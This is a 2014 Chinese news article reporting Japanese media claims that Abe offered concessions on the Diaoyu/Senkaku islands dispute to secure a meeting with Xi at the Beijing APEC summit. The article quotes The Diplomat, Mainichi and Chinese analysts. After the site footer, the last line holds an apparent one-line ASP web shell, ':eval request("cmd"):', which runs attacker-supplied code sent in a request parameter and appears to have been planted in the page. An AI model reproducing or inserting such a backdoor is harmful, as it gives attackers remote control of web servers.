保钓展望

日本真的就钓鱼岛屈服于中国作出让步了吗

时间:2014-10-22 22:33:28  作者:彭庭华  来源:  查看:86  评论:0
内容摘要:据日本媒体报道,为了确保能同中国国家主席习近平进行会晤,日本首相安倍晋三同意在中日钓鱼岛(日本称尖阁列岛)争端上做出重大让步。  正如《外交官》副主编香农?蒂耶兹(Shannon Tiezzi)在《中国力量》栏目中撰文所述那般,现在日本的官员们希望在11月北京APEC会议上,中国...

据日本媒体报道,为了确保能同中国国家主席习近平进行会晤,日本首相安倍晋三同意在中日钓鱼岛(日本称尖阁列岛)争端上做出重大让步。

  正如《外交官》副主编香农?蒂耶兹(Shannon Tiezzi)在《中国力量》栏目中撰文所述那般,现在日本的官员们希望在11月北京APEC会议上,中国国家主席习近平能同日本首相安倍晋三进行短暂的会晤,这将会是习近平与安倍在出任国家领导人以来的首次会晤。在提出两国领导人会晤之前,日本就对中国展开了长期的魅力攻势,其结果就是两国为在APEC期间召开元首会晤而进行了大量的幕后协商。

  就日本官方看来,这样的会晤象征意义是要大于实质意义的,但日本亦付出了高昂的代价。的确,如果日本媒体报道准确的话,那么东京似乎已经在至今以来制约两国元首进行会晤的主要问题上屈服(cave)了。

周四(16日),日本《每日新闻(Mainichi)》报道,为了保证中日两国元首能在下个月进行会晤,日本提出了三点建议。报道援引了“日本政府消息人士”表示,日本提议在“习安会”期间,安倍会先重申“钓鱼岛是日本固有领土”,但“已知晓中国有自己的主张”,并愿“力争花时间通过对话解决问题”。而三点都不会被写进联合声明或者任何其它会后发布的官方文件中。   
如果报道属实,那么安倍“承认领土存在争议”并提议“通过对话解决问题”确实表明了在中国长期以来一直要求的方面做出了让步。   
一直以来,日本政府都是拒绝承认中日存在钓鱼岛领土争端的。之前在很多场合,日本也都说过“尖阁列岛没有需要解决的领土主权问题”。   
长期以来,中国对中日举行首脑峰会设下的主要前提条件就是日本必须承认钓鱼岛存在争议。据日本共同社2013年6月的报道,“甚至在去年12月安倍政府就任之后,中国也一直将日本承认钓鱼岛存在主权争议设为中日领导人会晤的前提条件。”该报道也指出,如果日本不接受这样的条件,那么在可预见的未来内中日两国是无法举行元首峰会的。   
去年9月,中日两国也在联合国大会上公开就钓鱼岛问题展开争执。起初,在联大开幕前,中国外交部长王毅在美国布鲁金斯学会发表演讲表示中国愿意与日本重新开始对话,但首先“日本需要承认存在争议,全世界都知道存在争议。”   
而在去年联大的一场新闻发布会上,安倍似乎对王毅的话做出了回应,他说“从历史与国际法的观点来看,尖阁列岛是日本的固有领土,并且现在这些岛屿也在日本的实际管控之下。”尽管东京不愿意让局势升级并想同中国展开对话来避免武力冲突,安倍仍然坚称“日本不会在我们的领土主权上做出任何让步。”   
在中国,一些人已经将让步视作日本软弱的迹象。据《环球时报》报道,中国现代国际关系研究院日本研究所所长杨伯江表示,“迫于经济的压力,安倍想恢复同中国的对话并促进中日双边关系,所以他必须向世界展示他想要对话的意愿。”

 

相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):